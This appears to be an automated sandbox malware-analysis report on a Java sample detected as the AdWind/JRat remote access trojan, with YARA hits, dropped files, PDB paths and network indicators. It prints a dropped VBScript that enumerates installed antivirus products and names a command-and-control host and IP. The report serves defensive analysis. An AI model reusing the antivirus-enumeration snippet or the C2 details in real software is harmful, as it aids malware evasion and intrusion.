Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file

Yara detected AdWind RAT

Source: Yara match

File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR

Yara detected AdWind RATs dll

Source: Yara match	File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED

Java source code contains strings found in CrossRAT

Source: cmukyspiy.txt.0.dr	Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.335919510014015658379257619551515348.class.1.dr	Suspicious string: operational.JRat (in operational/Jrat.java)
Source: access-bridge-32.jar.18.dr	Suspicious string: operational.JRat (in operational/Jrat.java)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF11B0 _Java_com_Title_disableListener@8,		1_2_6EEF11B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF1110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW,		1_2_6EEF1110

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.151.123.225	pnauco5.ddns.net	unknown		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
pnauco5.ddns.net	103.151.123.225	true

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs	Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs	Avira: detection malicious, Label: VBS/Agent.281

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll

ReversingLabs: Detection: 85%

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssv\obj\ssv.pdb source: xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdcpr\dcpr.pdb// source: xcopy.exe, 00000012.00000003.1789079270.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdb source: xcopy.exe, 00000012.00000003.1828354060.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libbci\bci.pdb source: xcopy.exe, 00000012.00000003.1785460325.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdcpr\dcpr.pdb source: xcopy.exe, 00000012.00000003.1789079270.000000000229D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000012.00000003.1809783425.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_shmem\dt_shmem.pdb source: xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000012.00000003.1843767003.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: xcopy.exe, 00000012.00000003.1837839757.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb// source: xcopy.exe, 00000012.00000003.1800215371.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssv\obj\ssv.pdb, source: xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000012.00000003.1834933106.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdb source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000012.00000003.1843767003.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000012.00000003.1830377915.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: xcopy.exe, 00000012.00000003.1837383941.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000012.00000003.1806873100.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000012.00000003.1805928681.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000012.00000003.1800997315.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000012.00000003.1806079122.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2native\obj\jp2native.pdb source: xcopy.exe, 00000012.00000003.1829056839.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjdwp\jdwp.pdb>> source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000012.00000003.1842514297.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: xcopy.exe, 00000012.00000003.1835741846.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb..* source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjpeg\jpeg.pdbGG source: xcopy.exe, 00000012.00000003.1830214634.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000012.00000003.1806079122.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjava_crw_demo\java_crw_demo.pdb source: xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libresource\resource.pdb source: xcopy.exe, 00000012.00000003.1837161328.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: xcopy.exe, 00000012.00000003.1837383941.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: xcopy.exe, 00000012.00000003.1837839757.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: xcopy.exe, 00000012.00000003.1835741846.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000012.00000003.1800946728.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjdwp\jdwp.pdb source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: xcopy.exe, 00000012.00000003.1831821826.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: xcopy.exe, 00000012.00000003.1800215371.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000012.00000003.1806873100.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb8 source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: work\38\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: xcopy.exe, 00000012.00000003.1833916829.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000012.00000003.1791025674.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000012.00000003.1835216977.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjava\java.pdb source: xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: xcopy.exe, 00000012.00000003.1800789356.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjpeg\jpeg.pdb source: xcopy.exe, 00000012.00000003.1830214634.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2965408345.000000006EEF8000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdbKK5 source: xcopy.exe, 00000012.00000003.1828354060.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: xcopy.exe, 00000012.00000003.1831821826.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000012.00000003.1835216977.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000012.00000003.1834933106.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdbMM source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Exploit detected, runtime environment starts unknown processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Process created: C:\Windows\System32\conhost.exe

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: gcahfpmhcn.js	Return value : ['"adodb.stream"']			Go to definition
Source: gcahfpmhcn.js	Return value : ['"adodb.stream"']			Go to definition

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: pnauco5.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49744 -> 103.151.123.225:5000

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: pnauco5.ddns.net

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/3
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings9
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsorg/a9
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error=
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorSn
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errors/inter=
